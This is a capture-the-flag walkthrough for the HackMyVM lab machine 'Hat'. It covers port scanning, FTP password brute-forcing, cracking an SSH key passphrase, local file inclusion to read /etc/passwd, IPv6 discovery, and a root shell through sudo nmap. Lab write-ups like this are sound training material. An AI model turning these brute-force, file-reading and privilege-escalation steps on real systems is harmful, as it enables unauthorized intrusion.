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Writeup of Hat from HackMyVM – Walkthrough

hat hackmyvm walkthrough writeup security

Hat is a great machine from HackMyVM by d4t4s3c. The machine is not straightforward and one has to think laterally. Also, this includes techniques and vulnerabilities like local file inclusions, bruteforcing, etc. The machine works quite well on VirtualBox. “Writeup of Hat from HackMyVM – Walkthrough”

Link to the machine:

Identify the target

Firstly, I identified the IP address of the target machine.

sudo netdiscover -r
image 14
The IP address of the target is

Scan open ports

Next, I scanned the open ports on the target.

nmap -v -T4 -p- -sC -sV -oN nmap.log
image 15
Nmap scan results

Here, we can see that a filtered SSH port. Similarly, the FTP service is running at port 65535. Lastly, we have an HTTP port.

Enumerate the webserver

The homepage contains the default page of the apache server. Hence, I performed the directory enumeration on the server.

gobuster dir -r -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html -o dir-medium.log
image 16
The paths on the server

Now, I had two more paths to go. Since one of the directories is named logs, I searched for the logs file.

gobuster dir -r -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x log -o dir-logs-medium.log
image 17
A log file is present on the server

I found a file “vsftpd.log” on the directory and opened it.

image 18
The log file

From the log file, I got a possible username for FTP since it had logged in. To get the password, I simply bruteforced using rockyou.txt.

ncrack -v -f --user ftp_s3cr3t -P /home/kali/rockyou.txt
image 19 e1633521110207
The password of the user ftp_s3cr3t

Log into the FTP server

Now that I had the password of the user ftp_s3cr3t, I logged into the FTP server.

lftp -u ftp_s3cr3t -p 65535
image 20
FTP server

Upon opening the id_rsa file, I found out that this is encrypted. Hence, I bruteforced the passphrase of this.

~/ id_rsa > hash
john hash --wordlist=/home/kali/rockyou.txt
image 21
The passphrase of id_rsa

Although I found the SSH private key and its password, I still don’t have a username and SSH service to log into. However, my lftp client showed me the username as cromiphi. But, this might not be the intended way. So, let’s find the username by exploiting LFI.

Local File Inclusions

Previously, we had a directory “/php-scripts” on the server. This gives an idea that there might be some vulnerable scripts. So, let’s enumerate the filenames with PHP extension.

gobuster dir -r -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php -o dir-php-scripts-medium.log
image 22
The files inside /php-scripts

This instantly gave me a /file.php path. Furthermore, the name also suggests the possibility of LFI. Then, I identified the parameter for LFI.

ffuf -c -ic -r -u '' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 0
image 23
The GET parameter 6 gives LFI

Hence, I got the username as follows.

curl ''
image 24
The /etc/passwd file

Finally, I have everything but a port to connect to.

IPv6 enumeration

I tried to unlock the SSH port by searching the knockd.conf but it didn’t look like the target used knockd. With a little hint by the discord user avijneyam, I found out that the port is open if used as IPv6 socket.

Thus, I found the link-local address of the target. Also, the addressing mechanism is different in IPv6 from IPv4 protocol. But, we can find the link-local addresses on the network by using ping6 command.

ping6 -c2 -n -I eth0 ff02::1
image 25
The IPv6 address of the target

The highlighted address is the link-local IPv6 address of the target. Similarly, the one is the IPv6 of my machine.

ip a
image 26
The IPv6 address of the local machine

To confirm that port 22 is open when IPv6 is used, we can do a nmap scan.

nmap -p- fe80::a00:27ff:fe01:a372%eth0 -6 -v
image 27
The nmap scan results of the IPv6 address

Since the SSH port is open, we can log into it.

chmod 600 id_rsa
ssh cromiphi@fe80::a00:27ff:fe01:a372%eth0 -i id_rsa
image 28
The user shell of cromiphi

Root privilege escalation

Finally, I came to the root privilege escalation part which is the easiest step for this machine. When I checked the sudo permissions, I found that we can execute nmap as root. This would lead us to RPE.

image 29
The sudo permissions


echo 'os.execute("/bin/bash")' > $TF
sudo nmap --script=$TF
image 30
The root shell

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